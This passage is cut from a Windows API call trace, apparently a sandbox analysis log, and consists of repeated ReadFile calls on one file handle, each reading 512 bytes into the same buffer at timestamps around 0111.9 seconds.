lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.875] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.876] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.877] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.878] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.879] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.940] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.941] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.942] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, 